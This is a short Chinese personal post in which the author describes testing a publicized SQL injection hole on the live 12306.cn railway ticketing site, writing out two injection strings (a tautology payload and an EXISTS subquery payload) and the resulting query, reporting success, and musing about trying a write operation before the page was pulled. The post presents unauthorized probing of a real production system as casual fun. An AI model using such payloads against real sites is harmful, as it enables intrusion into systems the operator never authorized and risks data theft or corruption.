那会儿(8月27日)微博上疯传一张12306.cn的SQL注入漏洞截图:
以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。
根据trace提示简单构造一个:
' OR '1'='1' OR ZIZ='
注入后的效果应就是:
select * from TB_INFO_CLCS where flag = 'Y' and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm
果了个然~!成功鸟~!
同理再构造个子查询:
' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR ZIZ='
没报错,又成功鸟~!
当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:
晚上回家后发现该漏洞已经修复鸟~~~~~~